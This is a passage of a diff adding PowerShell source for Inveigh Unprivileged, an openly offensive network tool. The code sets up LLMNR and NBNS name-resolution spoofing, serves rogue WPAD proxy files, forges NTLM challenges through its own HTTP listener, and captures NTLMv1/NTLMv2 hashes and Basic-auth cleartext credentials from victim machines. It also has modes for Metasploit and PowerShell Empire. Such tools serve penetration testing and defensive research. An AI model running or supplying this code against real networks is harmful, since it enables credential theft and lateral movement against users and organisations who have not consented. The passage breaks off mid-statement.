+} +else +{ + $inveigh.output_stream_only = $false +} + +if($Tool -eq 1) # Metasploit Interactive PowerShell Payloads and Meterpreter's PowerShell Extension +{ + $inveigh.tool = 1 + $inveigh.output_stream_only = $true + $inveigh.newline = "" + $ConsoleOutput = "N" +} +elseif($Tool -eq 2) # PowerShell Empire +{ + $inveigh.tool = 2 + $inveigh.output_stream_only = $true + $inveigh.console_input = $false + $inveigh.newline = "`n" + $ConsoleOutput = "Y" + $ShowHelp = "N" +} +else +{ + $inveigh.tool = 0 + $inveigh.newline = "" +} + +# Write startup messages +$inveigh.status_queue.Add("Inveigh Unprivileged started at $(Get-Date -format 's')") > $null +$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Unprivileged started")]) > $null + +$firewall_status = netsh advfirewall show allprofiles state | Where-Object {$_ -match 'ON'} + +if($firewall_status) +{ + $inveigh.status_queue.Add("Windows Firewall = Enabled") > $null + + $firewall_rules = New-Object -comObject HNetCfg.FwPolicy2 + $firewall_powershell = $firewall_rules.rules | Where-Object {$_.Enabled -eq $true -and $_.Direction -eq 1} |Select-Object -Property Name | Select-String "Windows PowerShell}" + + if($firewall_powershell) + { + $inveigh.status_queue.Add("Windows Firewall - PowerShell.exe = Allowed") > $null + } + +} + +if($LLMNR -eq 'Y') +{ + $LLMNR_port_check = netstat -anp UDP | findstr 0.0.0.0:5355 + + if(!$LLMNR_port_check) + { + $inveigh.status_queue.Add("LLMNR Spoofer = Enabled") > $null + $inveigh.status_queue.Add("LLMNR TTL = $LLMNRTTL Seconds") > $null + $LLMNR_response_message = "- response sent" + } + else + { + $LLMNR = "N" + $inveigh.status_queue.Add("LLMNR Spoofer Disabled Due To In Use Port 5355") > $null + } +} +else +{ + $inveigh.status_queue.Add("LLMNR Spoofer = Disabled") > $null + $LLMNR_response_message = "- LLMNR spoofer is disabled" +} + +if($NBNS -eq 'Y') +{ + $NBNSTypes_output = $NBNSTypes -join "," + + if($NBNSTypes.Count -eq 1) + { + $inveigh.status_queue.Add("NBNS Spoofer For Type $NBNSTypes_output = Enabled") > $null + } + else + { + $inveigh.status_queue.Add("NBNS Spoofer For Types $NBNSTypes_output = Enabled") > $null + } + + $NBNS_response_message = "- response sent" +} +else +{ + $inveigh.status_queue.Add("NBNS Spoofer = Disabled") > $null + $NBNS_response_message = "- NBNS spoofer is disabled" +} + +if($NBNSBruteForce -eq 'Y') +{ + $inveigh.status_queue.Add("NBNS Brute Force Spoofer Target = $NBNSBruteForceTarget") > $null + $inveigh.status_queue.Add("NBNS Brute Force Spoofer IP Address = $SpooferIP") > $null + $inveigh.status_queue.Add("NBNS Brute Force Spoofer Hostname = $NBNSBruteForceHost") > $null + + if($NBNSBruteForcePause) + { + $inveigh.status_queue.Add("NBNS Brute Force Pause = $NBNSBruteForcePause Seconds") > $null + } + +} +else +{ + $inveigh.status_queue.Add("NBNS Brute Force Spoofer = Disabled") > $null +} + +if($NBNS -eq 'Y' -or $NBNSBruteForce -eq 'Y') +{ + $inveigh.status_queue.Add("NBNS TTL = $NBNSTTL Seconds") > $null +} + +if($SpooferHostsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y')) +{ + $inveigh.status_queue.Add("Spoofer Hosts Reply = " + ($SpooferHostsReply -join ",")) > $null +} + +if($SpooferHostsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y')) +{ + $inveigh.status_queue.Add("Spoofer Hosts Ignore = " + ($SpooferHostsIgnore -join ",")) > $null +} + +if($SpooferIPsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y')) +{ + $inveigh.status_queue.Add("Spoofer Ips Reply = " + ($SpooferIPsReply -join ",")) > $null +} + +if($SpooferIPsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y')) +{ + $inveigh.status_queue.Add("Spoofer IPs Ignore = " + ($SpooferIPsIgnore -join ",")) > $null +} + +if($SpooferRepeat -eq 'N') +{ + $inveigh.spoofer_repeat = $false + $inveigh.status_queue.Add("Spoofer Repeating = Disabled") > $null +} +else +{ + $inveigh.spoofer_repeat = $true +} + +if($HTTP -eq 'Y') +{ + $HTTP_port_check += netstat -anp TCP | findstr 0.0.0.0:$HTTPPort + + if($HTTPIP) + { + $HTTP_port_check += netstat -anp TCP | findstr $HTTPIP`:$HTTPPort + } + + if($HTTP_port_check) + { + $HTTP = "N" + $inveigh.status_queue.Add("HTTP Capture Disabled Due To In Use Port $HTTPPort") > $null + } + else + { + + if($HTTPIP) + { + $inveigh.status_queue.Add("HTTP IP Address = $HTTPIP") > $null + } + + if($HTTPPort -ne 80) + { + $inveigh.status_queue.Add("HTTP Port = $HTTPPort") > $null + } + + $inveigh.status_queue.Add("HTTP Capture = Enabled") > $null + $inveigh.status_queue.Add("HTTP Authentication = $HTTPAuth") > $null + $inveigh.status_queue.Add("WPAD Authentication = $WPADAuth") > $null + + if($HTTPResponse) + { + $inveigh.status_queue.Add("HTTP Custom Response = Enabled") > $null + } + + if($HTTPAuth -eq 'Basic' -or $WPADAuth -eq 'Basic') + { + $inveigh.status_queue.Add("Basic Authentication Realm = $HTTPBasicRealm") > $null + } + + if($WPADIP -and $WPADPort) + { + $inveigh.status_queue.Add("WPAD = $WPADIP`:$WPADPort") > $null + + if($WPADDirectHosts) + { + $inveigh.status_queue.Add("WPAD Direct Hosts = " + $WPADDirectHosts -join ",") > $null + } + + } + elseif($WPADResponse -and !$WPADIP -and !$WPADPort) + { + $inveigh.status_queue.Add("WPAD Custom Response = Enabled") > $null + } + elseif($WPADEmptyFile -eq 'Y') + { + $inveigh.status_queue.Add("WPAD Default Response = Enabled") > $null + } + + if($Challenge) + { + $inveigh.status_queue.Add("NTLM Challenge = $Challenge") > $null + } + + if($MachineAccounts -eq 'n') + { + $inveigh.status_queue.Add("Machine Account Capture = Disabled") > $null + $inveigh.machine_accounts = $false + } + else + { + $inveigh.machine_accounts = $true + } + + } + +} +else +{ + $inveigh.status_queue.Add("HTTP Capture = Disabled") > $null +} + +if($ConsoleOutput -eq 'Y') +{ + $inveigh.status_queue.Add("Real Time Console Output = Enabled") > $null + $inveigh.console_output = $true + + if($ConsoleStatus -eq 1) + { + $inveigh.status_queue.Add("Console Status = $ConsoleStatus Minute") > $null + } + elseif($ConsoleStatus -gt 1) + { + $inveigh.status_queue.Add("Console Status = $ConsoleStatus Minutes") > $null + } + +} +else +{ + + if($inveigh.tool -eq 1) + { + $inveigh.status_queue.Add("Real Time Console Output Disabled Due To External Tool Selection") > $null + } + else + { + $inveigh.status_queue.Add("Real Time Console Output = Disabled") > $null + } + +} + +if($ConsoleUnique -eq 'Y') +{ + $inveigh.console_unique = $true +} +else +{ + $inveigh.console_unique = $false +} + +if($FileOutput -eq 'Y') +{ + $inveigh.status_queue.Add("Real Time File Output = Enabled") > $null + $inveigh.status_queue.Add("Output Directory = $output_directory") > $null + $inveigh.file_output = $true +} +else +{ + $inveigh.status_queue.Add("Real Time File Output = Disabled") > $null +} + +if($FileUnique -eq 'Y') +{ + $inveigh.file_unique = $true +} +else +{ + $inveigh.file_unique = $false +} + +if($RunTime -eq 1) +{ + $inveigh.status_queue.Add("Run Time = $RunTime Minute") > $null +} +elseif($RunTime -gt 1) +{ + $inveigh.status_queue.Add("Run Time = $RunTime Minutes") > $null +} + +if($RunCount) +{ + $inveigh.status_queue.Add("Run Count = $RunCount") > $null +} + +if($ShowHelp -eq 'Y') +{ + $inveigh.status_queue.Add("Run Stop-Inveigh to stop Inveigh-Unprivileged") > $null + + if($inveigh.console_output) + { + $inveigh.status_queue.Add("Press any key to stop real time console output") > $null + } + +} + +if($inveigh.status_output) +{ + + while($inveigh.status_queue.Count -gt 0) + { + + if($inveigh.output_stream_only) + { + Write-Output($inveigh.status_queue[0] + $inveigh.newline) + $inveigh.status_queue.RemoveAt(0) + } + else + { + + switch -Wildcard ($inveigh.status_queue[0]) + { + + "* Disabled Due To *" + { + Write-Warning($inveigh.status_queue[0]) + $inveigh.status_queue.RemoveAt(0) + } + + "Run Stop-Inveigh to stop Inveigh-Unprivileged" + { + Write-Warning($inveigh.status_queue[0]) + $inveigh.status_queue.RemoveAt(0) + } + + "Windows Firewall = Enabled" + { + Write-Warning($inveigh.status_queue[0]) + $inveigh.status_queue.RemoveAt(0) + } + + default + { + Write-Output($inveigh.status_queue[0]) + $inveigh.status_queue.RemoveAt(0) + } + + } + + } + + } + +} + +# Begin ScriptBlocks + +# Shared Basic functions ScriptBlock +$shared_basic_functions_scriptblock = +{ + + function DataLength2 + { + param ([Int]$length_start,[Byte[]]$string_extract_data) + + $string_length = [System.BitConverter]::ToUInt16($string_extract_data[$length_start..($length_start + 1)],0) + return $string_length + } + + function DataLength4 + { + param ([Int]$length_start,[Byte[]]$string_extract_data) + + $string_length = [System.BitConverter]::ToUInt32($string_extract_data[$length_start..($length_start + 3)],0) + return $string_length + } + + function DataToString + { + param ([Int]$string_start,[Int]$string_length,[Byte[]]$string_extract_data) + + $string_data = [System.BitConverter]::ToString($string_extract_data[$string_start..($string_start + $string_length - 1)]) + $string_data = $string_data -replace "-00","" + $string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $string_extract = New-Object System.String ($string_data,0,$string_data.Length) + return $string_extract + } + +} + +# HTTP Server ScriptBlock - HTTP listener +$HTTP_scriptblock = +{ + param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPIP,$HTTPPort,$HTTPResponse,$NBNSBruteForcePause,$WPADAuth,$WPADEmptyFile,$WPADIP,$WPADPort,$WPADDirectHosts,$WPADResponse,$RunCount) + + function NTLMChallengeBase64 + { + param ([String]$Challenge) + + $HTTP_timestamp = Get-Date + $HTTP_timestamp = $HTTP_timestamp.ToFileTime() + $HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp)) + $HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + + if($Challenge) + { + $HTTP_challenge = $Challenge + $HTTP_challenge_bytes = $HTTP_challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-') + $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + } + else + { + $HTTP_challenge_bytes = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) + $HTTP_challenge = $HTTP_challenge_bytes -replace ' ', '' + $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + } + + $inveigh.HTTP_challenge_queue.Add($HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString + $HTTP_client.Client.RemoteEndpoint.Port + ',' + $HTTP_challenge) > $null + + $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38, + 0x00,0x00,0x00,0x05,0x82,0x89,0xa2 + + $HTTP_challenge_bytes + + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06, + 0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00, + 0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54, + 0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00, + 0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24, + 0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00, + 0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61, + 0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00, + 0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 + + $HTTP_timestamp + + 0x00,0x00,0x00,0x00,0x0a,0x0a + + $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes) + $NTLM = "NTLM " + $NTLM_challenge_base64 + $NTLM_challenge = $HTTP_challenge + + return $NTLM + } + + if($HTTPIP) + { + $HTTPIP = [System.Net.IPAddress]::Parse($HTTPIP) + $HTTP_endpoint = New-Object System.Net.IPEndPoint($HTTPIP,$HTTPPort) + } + else + { + $HTTP_endpoint = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::any,$HTTPPort) + } + + $HTTP_listener = New-Object System.Net.Sockets.TcpListener $HTTP_endpoint + $HTTP_listener.Start() + + $HTTP_WWW_authenticate_header = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20 # WWW-Authenticate + $run_count_NTLMv1 = $RunCount + $inveigh.NTLMv1_list.Count + $run_count_NTLMv2 = $RunCount + $inveigh.NTLMv2_list.Count + $run_count_cleartext = $RunCount + $inveigh.cleartext_list.Count + + if($WPADIP -and $WPADPort) + { + + if($WPADDirectHosts) + { + + foreach($WPAD_direct_host in $WPADDirectHosts) + { + $WPAD_direct_hosts_function += 'if (dnsDomainIs(host, "' + $WPAD_direct_host + '")) return "DIRECT";' + } + + $HTTP_WPAD_response = "function FindProxyForURL(url,host){" + $WPAD_direct_hosts_function + "return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}" + } + else + { + $HTTP_WPAD_response = "function FindProxyForURL(url,host){return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}" + } + + } + elseif($WPADResponse) + { + $HTTP_WPAD_response = $WPADResponse + } + elseif($WPADEmptyFile -eq 'Y') + { + $HTTP_WPAD_response = "function FindProxyForURL(url,host){return `"DIRECT`";}" + } + + $HTTP_client_close = $true + + :HTTP_listener_loop while ($inveigh.unprivileged_running) + { + $TCP_request = "" + $TCP_request_bytes = New-Object System.Byte[] 1024 + + while(!$HTTP_listener.Pending() -and !$HTTP_client.Connected) + { + + Start-Sleep -m 10 + + if(!$inveigh.unprivileged_running) + { + break HTTP_listener_loop + } + + } + + if(!$HTTP_client.Connected -or $HTTP_client_close -and $inveigh.unprivileged_running) + { + $HTTP_client = $HTTP_listener.AcceptTcpClient() # will block here until connection + $HTTP_stream = $HTTP_client.GetStream() + } + + $HTTP_stream_timeout = New-TimeSpan -Seconds 2 + $HTTP_stream_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + + while($HTTP_stream.DataAvailable -and $HTTP_stream_stopwatch.Elapsed -lt $HTTP_stream_timeout) + { + $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length) + } + + $TCP_request = [System.BitConverter]::ToString($TCP_request_bytes) + + if($TCP_request -like "47-45-54-20*" -or $TCP_request -like "48-45-41-44-20*" -or $TCP_request -like "4f-50-54-49-4f-4e-53-20*") + { + $HTTP_raw_URL = $TCP_request.Substring($TCP_request.IndexOf("-20-") + 4,$TCP_request.Substring($TCP_request.IndexOf("-20-") + 1).IndexOf("-20-") - 3) + $HTTP_raw_URL = $HTTP_raw_URL.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $HTTP_request_raw_URL = New-Object System.String ($HTTP_raw_URL,0,$HTTP_raw_URL.Length) + + if($NBNSBruteForcePause) + { + $inveigh.NBNS_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + $inveigh.hostname_spoof = $true + } + + if($TCP_request -like "*-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-*") + { + $HTTP_authorization_header = $TCP_request.Substring($TCP_request.IndexOf("-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-") + 46) + $HTTP_authorization_header = $HTTP_authorization_header.Substring(0,$HTTP_authorization_header.IndexOf("-0D-0A-")) + $HTTP_authorization_header = $HTTP_authorization_header.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $authentication_header = New-Object System.String ($HTTP_authorization_header,0,$HTTP_authorization_header.Length) + } + else + { + $authentication_header = "" + } + + if($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous') + { + $HTTP_response_status_code = 0x32,0x30,0x30 + $HTTP_response_phrase = 0x4f,0x4b + } + else + { + $HTTP_response_status_code = 0x34,0x30,0x31 + $HTTP_response_phrase = 0x55,0x6e,0x61,0x75,0x74,0x68,0x6f,0x72,0x69,0x7a,0x65,0x64 + } + + $HTTP_type = "HTTP" + $NTLM = "NTLM" + $NTLM_auth = $false + $HTTP_source_IP = $HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString + + if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $HTTP_client.Client.Handle) + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")]) + } + + if($authentication_header.startswith('NTLM ')) + { + $authentication_header = $authentication_header -replace 'NTLM ','' + [Byte[]]$HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header) + $HTTP_response_status_code = 0x34,0x30,0x31 + + if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00') + { + $HTTP_response_status_code = 0x34,0x30,0x31 + $NTLM = NTLMChallengeBase64 $Challenge + $HTTP_client_close = $false + } + elseif([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '03-00-00-00') + { + $NTLM = "NTLM" + $HTTP_NTLM_length = DataLength2 20 $HTTP_request_bytes + $HTTP_NTLM_offset = DataLength4 24 $HTTP_request_bytes + $HTTP_NTLM_domain_length = DataLength2 28 $HTTP_request_bytes + $HTTP_NTLM_domain_offset = DataLength4 32 $HTTP_request_bytes + [String]$NTLM_challenge = $inveigh.HTTP_challenge_queue -like $HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + '*' + $HTTP_challenge_queue.Remove($NTLM_challenge) + $NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1) + + if($HTTP_NTLM_domain_length -eq 0) + { + $HTTP_NTLM_domain_string = "" + } + else + { + $HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_offset $HTTP_NTLM_domain_length $HTTP_request_bytes + } + + $HTTP_NTLM_user_length = DataLength2 36 $HTTP_request_bytes + $HTTP_NTLM_user_offset = DataLength4 40 $HTTP_request_bytes + $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes + $HTTP_NTLM_host_length = DataLength2 44 $HTTP_request_bytes + $HTTP_NTLM_host_offset = DataLength4 48 $HTTP_request_bytes + $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_offset $HTTP_NTLM_host_length $HTTP_request_bytes + + if($HTTP_NTLM_length -eq 24) # NTLMv1 + { + $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[($HTTP_NTLM_offset - 24)..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-","" + $NTLM_response = $NTLM_response.Insert(48,':') + $HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge + + if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))) + { + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP ($HTTP_NTLM_host_string)")]) + $inveigh.NTLMv1_list.Add($HTTP_NTLM_hash) + + if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) + { + $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n" + $HTTP_NTLM_hash) + } + else + { + $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") + } + + if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))) + { + $inveigh.NTLMv1_file_queue.Add($HTTP_NTLM_hash) + $inveigh.console_queue.Add("$HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file) + } + + if($inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") + { + $inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") + } + + } + + } + else # NTLMv2 + { + $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[$HTTP_NTLM_offset..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-","" + $NTLM_response = $NTLM_response.Insert(32,':') + $HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLM_response + + if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))) + { + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP ($HTTP_NTLM_host_string)")]) + $inveigh.NTLMv2_list.Add($HTTP_NTLM_hash) + + if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) + { + $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n" + $HTTP_NTLM_hash) + } + else + { + $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") + } + + if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))) + { + $inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash) + $inveigh.console_queue.Add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file) + } + + if($inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") + { + $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") + } + + } + + } + + if ($inveigh.IP_capture_list -notcontains $HTTP_source_IP -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $HTTP_source_IP -ne $IP) + { + $inveigh.IP_capture_list.Add($HTTP_source_IP) + } + + $HTTP_response_status_code = 0x32,0x30,0x30 + $HTTP_response_phrase = 0x4f,0x4b + $NTLM_auth = $true + $HTTP_client_close = $true + $NTLM_challenge = "" + } + else + { + $NTLM = "NTLM" + $HTTP_client_close = $false + } + + } + elseif($authentication_header.startswith('Basic ')) + { + $HTTP_response_status_code = 0x32,0x30,0x30 + $HTTP_response_phrase = 0x4f,0x4b + $authentication_header = $authentication_header -replace 'Basic ','' + $cleartext_credentials = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($authentication_header)) + $HTTP_client_close = $true + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from $HTTP_source_IP")]) + $inveigh.cleartext_file_queue.Add($cleartext_credentials) + $inveigh.cleartext_list.Add($cleartext_credentials) + $inveigh.console_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials $cleartext_credentials captured from $HTTP_source_IP") + + if($inveigh.file_output) + { + $inveigh.console_queue.Add("Basic auth cleartext credentials written to " + $inveigh.cleartext_out_file) + } + + } + else + { + if($HTTPAuth -ne 'Anonymous' -or ($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -ne 'Anonymous')) + { + $HTTP_client_close = $false + } + else + { + $HTTP_client_close = $true + } + + } + + $HTTP_timestamp = Get-Date -format r + $HTTP_timestamp = [System.Text.Encoding]::UTF8.GetBytes($HTTP_timestamp) + + if((($WPADIP -and $WPADPort) -or $WPADResponse -or $WPADEmptyFile -eq 'Y') -and $HTTP_request_raw_URL -match '/wpad.dat') + { + $HTTP_message = $HTTP_WPAD_response + } + elseif($HTTPResponse -and $HTTP_request_raw_URL -notmatch '/wpad.dat') + { + $HTTP_message = $HTTPResponse + } + else + { + $HTTP_message = "" + } + + $HTTP_timestamp = Get-Date -format r + $HTTP_timestamp = [System.Text.Encoding]::UTF8.GetBytes($HTTP_timestamp) + + if(($HTTPAuth -eq 'NTLM' -and $HTTP_request_raw_URL -notmatch '/wpad.dat') -or ($WPADAuth -eq 'NTLM' -and $HTTP_request_raw_URL -match '/wpad.dat') -and !$NTLM_auth) + { + $NTLM = [System.Text.Encoding]::UTF8.GetBytes($NTLM) + $HTTP_message_bytes = 0x0d,0x0a + $HTTP_content_length_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message.Length) + $HTTP_message_bytes += [System.Text.Encoding]::UTF8.GetBytes($HTTP_message) + + $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 + + $HTTP_response_status_code + + 0x20 + + $HTTP_response_phrase + + 0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73, + 0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d, + 0x0a,0x44,0x61,0x74,0x65,0x3a + + $HTTP_timestamp + + 0x0d,0x0a + + $HTTP_WWW_authenticate_header + + $NTLM + + 0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20, + 0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73, + 0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e, + 0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 + + $HTTP_content_length_bytes + + 0x0d,0x0a + + $HTTP_message_bytes + + } + elseif(($HTTPAuth -eq 'Basic' -and $HTTP_request_raw_URL -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Basic' -and $HTTP_request_raw_URL -match '/wpad.dat')) + { + $Basic = [System.Text.Encoding]::UTF8.GetBytes("Basic realm=$HTTPBasicRealm") + $HTTP_message_bytes = 0x0d,0x0a + $HTTP_content_length_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message.Length) + $HTTP_message_bytes += [System.Text.Encoding]::UTF8.GetBytes($HTTP_message) + + $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 + + $HTTP_response_status_code + + 0x20 + + $HTTP_response_phrase + + 0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73, + 0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d, + 0x0a,0x44,0x61,0x74,0x65,0x3a + + $HTTP_timestamp + + 0x0d,0x0a + + $HTTP_WWW_authenticate_header + + $Basic + + 0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20, + 0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73, + 0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e, + 0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 + + $HTTP_content_length_bytes + + 0x0d,0x0a + + $HTTP_message_bytes + + } + else + { + $HTTP_response_status_code = 0x32,0x30,0x30 + $HTTP_response_phrase = 0x4f,0x4b + $HTTP_message_bytes = 0x0d,0x0a + $HTTP_content_length_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message.Length) + $HTTP_message_bytes += 